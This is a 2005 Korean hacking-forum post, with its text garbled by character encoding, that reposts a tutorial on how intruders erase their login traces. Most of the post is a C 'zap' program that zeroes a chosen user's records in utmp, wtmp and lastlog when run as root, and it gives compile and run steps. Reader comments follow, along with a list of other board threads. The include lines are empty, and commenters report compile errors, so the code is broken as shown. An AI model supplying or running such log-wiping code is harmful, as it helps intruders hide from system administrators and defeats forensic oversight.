1596, 6/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   starztp
   [Æß]ÇØÄ¿µéÀÇ ÈçÀûÁö¿ì´Â¹æ¹ý

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=333 [º¹»ç]





*ÇØÄ¿µéÀÌ ÀÚ½ÅÀÇ ÈçÀûÀ» Áö¿ì´Â ¹æ¹ý





ÀÚ½ÅÀÇ ·Î±ä Á¤º¸¸¦ Áö¿ì´Â ÇÁ·Î±×·¥Àº

±âº»ÀûÀ¸·Î /etc/utmp¿Í /var/adm/wtmp¿Í /var/adm/lastlog¿¡ ´ëÇÑ Àбâ¿Í

¾²±â±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÕ´Ï´Ù. SunOS 4.1.X°è¿­ÀÇ utmpÀÇ ¸ðµå°¡ -rw-rw-rw-·Î

µÇ¾î ÀÖ°í SunOS 5.X °è¿­ÀÇ utmpÀÇ ¸ðµå´Â -rw-r-r-·Î µÇ¾î ÀÖ½À´Ï´Ù.

½Ã½ºÅÛ¿¡ µû¶ó ´Ù¸¦ ¼öµµ ÀÖÁö¿ä. µû¶ó¼­, ÀÌ ÇÁ·Î±×·¥À» ½ÇÇàÇØ º¸·Á°í ÇÏ´Â

»ç¶÷Àº SunOS 4.1.XÀ» »ç¿ëÇØ¾ß ÇÕ´Ï´Ù. ÀÌ´Â uname -aÀÇ ¸í·É¾î·Î ¾Ë¾Æ º¼ ¼ö

ÀÖ½À´Ï´Ù. ±×·±µ¥ ÀÚ½ÅÀÌ ÀÏ¹Ý »ç¿ëÀÚ°¡ ¾Æ´Ñ root¶ó¸é ±¸Áö OSÀÇ ¹öÀü¿¡

¿µÇâÀ» ¹ÞÀ» ÇÊ¿ä°¡ ¾ø½À´Ï´Ù. ÇØÄ¿³ª ´Ù¸¥ »ç¶÷ÀÌ Á¢¼ÓÇÏ¸é ½Ã½ºÅÛ¿¡

/etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏ¿¡ Á¢¼Ó ±â·ÏÀÌ ³²½À´Ï´Ù.

±×·¡¼­ ÈçÀûÀ» ¾ø¾Ö±â À§Çؼ­´Â À§ÀÇ È­ÀÏÀ» º¯°æÇÕ´Ï´Ù. À̰͵éÀº ÅؽºÆ® ÆÄÀÏÀÌ

¾Æ´Ï¶ó¼­ vi·Î ÆíÁýÇÒ ¼ö ¾ø°í Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±×·¥À» ÀÛ¼ºÇØ¾ß ÇÕ´Ï´Ù.

¹Ù·Î ±× ÇÁ·Î±×·¥ÀÌ ¾Æ·¡¿¡ ÀÖ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. C¾ð¾î·Î ÀÛ¼º µÇ¾î ÀÖ½À´Ï´Ù.

ÀÌ ÇÁ·Î±×·¥ ¸»°íµµ ¿©·¯ °¡ÁöÀÇ ÈçÀû Áö¿ì´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù´Â °ÍÀ» ¾Ë·Áµå¸³´Ï´Ù.

¾Æ·¡ ÇÁ·Î±×·¥À» rootÀÇ ±ÇÇÑ¿¡¼­ µ¹·Á¼­ Á¢¼ÓÈçÀûÀ» Áö¿ó´Ï´Ù.

À¯´Ð½º ½© »óÅ¿¡¼­ ¾Æ·¡ ÆÄÀϸíÀ» test.c·Î ÀúÀåÇؼ­ cc -o rmuser test.c ·Î

ÄÄÆÄÀÏ Çؼ­ rmuser¸¦ ½ÇÇà½ÃÅ°¸é µË´Ï´Ù.



hack%cc -o rmuser test.c

hack%rmuser



À§ÀÇ ¸í·ÉÀ» ½ÇÇàÇؼ­ who¶ó°í ¸í·É Çغ¸½Ê½Ã¿À.

±ôÂÊ °°ÀÌ ÀÚ½ÅÀÌ »ç¶óÁ® ÀÖÀ» °Ì´Ï´Ù.

Âü°í·Î who´Â ÇöÀç ½Ã½ºÅÛ¿¡ ·Î±äÇØ ÀÖ´Â »ç¿ëÀÚ¸¦ ¾Ë¾Æº¸´Â ¸í·É¾î ÀÔ´Ï´Ù.



ÇÁ·Î±×·¥ ¼Ò½º tset.cÀÇ ³»¿ë



#include

#include

#include

#include

#include

#include

#include

#include



#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;



if ((f=open(UTMP_NAME,O_RDWR))>=0) {



while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )



if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {



bzero((char *)&utmp_ent,sizeof( utmp_ent ));



lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);



write (f, &utmp_ent, sizeof (utmp_ent));



}



close(f);



}



}



void kill_wtmp(who)



char *who;



{



struct utmp utmp_ent;



long pos;

pos = 1L;



if ((f=open(WTMP_NAME,O_RDWR))>=0) {



while(pos != -1L) {



lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);



if (read (f, &utmp_ent, sizeof (struct utmp))<0) {



pos = -1L;



} else {



if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {



bzero((char *)&utmp_ent,sizeof(struct utmp ));



lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);



write (f, &utmp_ent, sizeof (utmp_ent));



pos = -1L;



} else pos += 1L;



}



}



close(f);



}



}



void kill_lastlog(who)



char *who;



{

struct passwd *pwd;

struct lastlog newll;



if ((pwd=getpwnam(who))!=NULL) {



if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {



lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);



bzero((char *)&newll,sizeof( newll ));



write(f, (char *)&newll, sizeof( newll ));



close(f);



}



} else printf("%s: ?\n",who);



}



main(argc,argv)



int argc;



char *argv[];



{



if (argc==2) {



kill_lastlog(argv[1]);



kill_wtmp(argv[1]);



kill_utmp(argv[1]);



printf("Zap2!\n");



} else printf("Error.\n");

}


  Hit : 13200     Date : 2005/10/08 03:53



    
starztp Æۿ°̴ϴÙ. ¸¸¾à À߸øµÈºÎºÐÀÌÀÖ´Ù¸é ¸®Çô޾ÆÁÖ¼¼¿ä ¹Ù·Î»èÁ¦ÇÏ°Ú½À´Ï´Ù.(´ÔµéÀº À̱ÛÀ» ¾Ë¾ÆµéÀ¸½Ç²¨¶ó »ý°¢ÇÏ¿© ¿Ã¸°°Ì´Ï´Ù ¹°·Ð Àú´Â ¹«½¼³»¿ëÀÎÁö ÀßÀº¸ð¸£Áö¸¸¿ä..) °í¼ö´ÔµéÀÌ º¸½Ã°í 2005/10/08  
starztp À߸øµÈºÎºÐÀ̳ª ¼öÁ¤ÇؾßÇҺκР±×¸®°í Áߺ¹³»¿ë ¾µ¶¼¾ø´Â³»¿ëÀ̶ó¸é ¾ÇÇôٽÃÁö¸¶½Ã°í ±×³É ÀÌ·±Àú·±»çÀ¯·ÎÀÎÇؼ­ »èÁ¦ºÎŹÇÑ´Ù°í ½áÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù....^^ 2005/10/08  
nsh009 ¼Ò½º°¡ ¸¹ÀÌ ±æ¾îÁø°Å °°³»¿ä.. ÀÎÅÍ³Ý µ¹¾Æ´Ù´Ï´Ù°¡ º»°Å¶û ºñ±³Çϸé.. ²Ï ±â³×¿ä.. 2005/10/08  
°ñµå ¾îµð¼±°¡ º»°Å´Â °°Àºµ¥ ... ¾îµð¼­¿´Áö 2005/10/08  
awsedr45 ±×¿Ü etc/syslog.conf /var/adm/sulog /var/log /.history bash.history /var/adm/utmp wtmp µµ ÀÖ½À´Ï´Ù. 2005/10/08  
kamijyo Çì´õÆÄÀÏÀÌ ¾È½áÁø°Å °°Àºµ¥; ¹«¾ù ¹«¾ùÀÌ ¾²Àΰǰ¡¿ä?? 2005/10/08  
starztp Çì´õÆÄÀÏÀ̹ºÁö Àú´Â¸ð¸¨´Ï´Ùa Ȥ °í¼ö´ÔµéÀÌ º¸½Ã¸é ¾Ë±î µµ¿òÀÌ µÉ±î½Í¾î Æۿ°̴ϴÙ;;; ÇãÁ¢³»¿ëÀ̶ó¸é »èÁ¦ÇÏ°Ú½À´Ï´Ù;; »èÁ¦ ¿äûÇØÁÖ¼¼¿ä ; 2005/10/09  
°ñµå #include<stdio.h> ÀÌ·±°Ô Çì´õÆÄÀÏÀε¥ #include ¿·¿¡ ¾Æ¹«°Íµµ ¾ø³×¿ä. Áö¿öÁ³³ª. 2005/10/10  
µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® µ¹´ë°¡¸® ³»´ë°¡¸® ¤¶¤²¤©¤± Àú°Å ÁøÂ¥¸ð¸£°Ù´Ù ¤Ð¤Ð 2005/10/12
starztp ±Û½ê¿äa 2005/10/13  
º¸±âµå¹®Å·Ä« ¿ª½ÃC++°ú ¸®´ª½º´Â ÆÄ°íµé¼ö·Ï ¸Ó¸® ¾ÆÆÄÁü ¤Ñ¤Ñ ¾Æ ¾î¶»°Ô ÇØ¾ß Á¡¼ö Àß¹ÞÀ»±î¿ä Çб³¼­ ¤Ñ¤Ñ¤» 2005/10/16
¸Û¸Û¡¡¡¡ À߸øµÈ ºÎºÐ ¼öÁ¤µÇ¾ú½À´Ï´Ù printf("Zap2!\n"); ¿¡¼­ printf("Zap1!\n"); ·Î 2005/10/26  
angel6116 ¹ÌÄ¡µµ·Ï ¹º¸»ÀÎÁö ¾Ë°í½Í¾îÁø´Ù;; ÀüÇô ¾Ë¾ÆµéÀ»¼ö°¡ ¾ø³×..¤Ð_¤Ð 2005/11/06  
.. -_- Çì´õÆÄÀÏ stdio.h , utmp.h , fcntl.h µî ³Ö°í ÄÄÆÈÇß´õ´Ï ÇÔ¼ö³» ¿¡·¯ -¤±-;; 2005/11/10
.. L_XTND ¼±¾ð ¾ÈµÇ¾îÀִٴµ­ -¤±-; 2005/11/10
c0003c ÀÌ°Ô µµ´ëü ¹º¸»ÀÌ¿©-_-;; 2005/11/13  
tbvjqk À¸¾Ç ¸Ó¸® ¾ÆÆÄ 2005/11/13  
msjeon9323 Çä Àú°Å ¾´ ´Ô!! Á» ½±°Ô ¼³¸í ±Û·Î... 2005/11/20  
±×¸°³ª·¡ include ¿¡ Çì´õÆÄÀÏÀÌ ºüÁ®Àֳ׿ä.. ¾Æ¸¶ ²©»õÇ¥½Ã°¡ ű×..·Î ÀÎÇØ »ç¶óÁøµíÇѵ¥¿ä 2005/11/29  
H.R.T -0- ÀÌ°Ô¸Ó¾ß...¾Ë¾Æº¼¼ö°¡ ¾ø³×..;;¤»¤» 2005/12/12  
X-line ¼Ò½ºÀÝ¾Æ¿ä ¤¾¤¾ 2005/12/15  
X-line ÀÌ°Å ÀÌÇØÇÒ¼öÀÖ´Ù¸é Á¤¸» ÁÁÀ»ÅÙµ¥.. 2005/12/15  
¹«¼ÒÀ¯ ÇØÄ¿½ºÄðÃ¥¿¡µµ ÀÌ·±°Å ³ª¿Ôµç°Å°°µçµ¥ ¤¾ 2005/12/16  
gbajh ÇØÄ¿½ºÄð Ã¥µµ ÀÖ¾î¿ä? 2006/01/02  
¹Ùº¸ÇØÄ¿ C++ÀÇ¿Ü·Î ¹è¿ì¸é ½±»ï! 2006/01/22
marilin29 Çä! 2006/12/12  
whqkdnf000 °¨»çÇÕ´Ï´Ù...ÁÁÀºÁ¤º¸ 2007/02/26  
rocket07 fopne ÇÔ¼ö¿¡¼­ f ºüÁø°Å °°Àºµ­. . 2012/01/21  
1496   ¸®´ª½º ¼³Ä¡Çϱâ - ÆÄƼ¼ÇÆí[6]     ¼ÒÀ¯
10/06 10050
1495   ¸®´ª½º ¼³Ä¡Çϱâ - µð·ºÅ丮Æí     ¼ÒÀ¯
10/06 9913
1494   ¾ÕÀ¸·Î À̾îÁú ±Û¿¡ ´ëÇؼ­.....[2]     ¼ÒÀ¯
10/06 9074
1493   »çȸ°øÇÐ[3]´ý½ºÅÍ ´ÙÀ̺ù[8]     idl0521
10/06 9652
1492   »çȸ°øÇÐ[4]¿Â¶óÀλ󿡼­ÀÇ »çȸ°øÇÐ[8]     idl0521
10/07 9165
1491   ¸®´ª½º ¼³Ä¡Çϱâ - ½©Æí[2]     ¼ÒÀ¯
10/07 10224
  [Æß]ÇØÄ¿µéÀÇ ÈçÀûÁö¿ì´Â¹æ¹ý[28]     starztp
10/08 13199
1489   ¸®´ª½º ¼³Ä¡Çϱâ - RPMÆí[3]     ¼ÒÀ¯
10/09 10191
1488   ¿À¹öŬ·°Å·ÀÇ ¿ø¸®[11]     ÄÁƼ´º
10/09 10926
1487   À©µµ¿ìÁîxp ÆÁ(1)[8]     ÄÁƼ´º
10/09 9968
1486   ¸®´ª½º¿¡¼­ ÀÎÅͳÝÀÌ ¾ÈµÉ¶§(asiris2000´Ô °­ÁÂ)[6]     ÄÁƼ´º
10/13 10374
1485   Linux ¿¡¼­ APM(apache+php+mysql) ¼Ò½º·Î ¼³Ä¡ Çϱâ[5]     Æ÷ºñ
10/29 8429
1484   [Àâ] ³×Æ®¿öÅ© TCP[8]     ¼ÒÀ¯
10/31 9766
1483   [Àâ] ³×Æ®¿öÅ© IP[5]     ¼ÒÀ¯
11/01 10637
1482     [re] À©µµ¿ì, ƽ ¼Ò¸®³ª¸é¼­ ´Ù¿î µÇ´Â °æ¿ì... ÇãÁ¢°­Á     my1004
11/02 7411
1481   Ãʺ¸ ÇØÄ¿ Áöħ¼­ [1Æí] [ÇØÅ·Àº °ú¿¬ ¹«¾ùÀϱî?][25]     khas
11/03 11527
1480   [ÆÁ] ÀÚµ¿¿Ï¼º±â´É[17]     khas
11/03 8337
1479   ±¸±Û ÇØÅ·?[7]     nsh009
11/06 13518
1478   ÀÚÀ¯ °Ô½ÃÆÇ¿¡ Àִ°ŠÈÉÃļ­ Æ÷ÀÎÆ® ¿Ã¸®±â!! ÀÕÈþ~*[6]     a456753
11/19 9516
1477   #01 Protel CAD - ¼­¹®     ¾ÆÀÌÇÁ¸®µå
11/21 11615
[1][2][3][4][5] 6 [7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org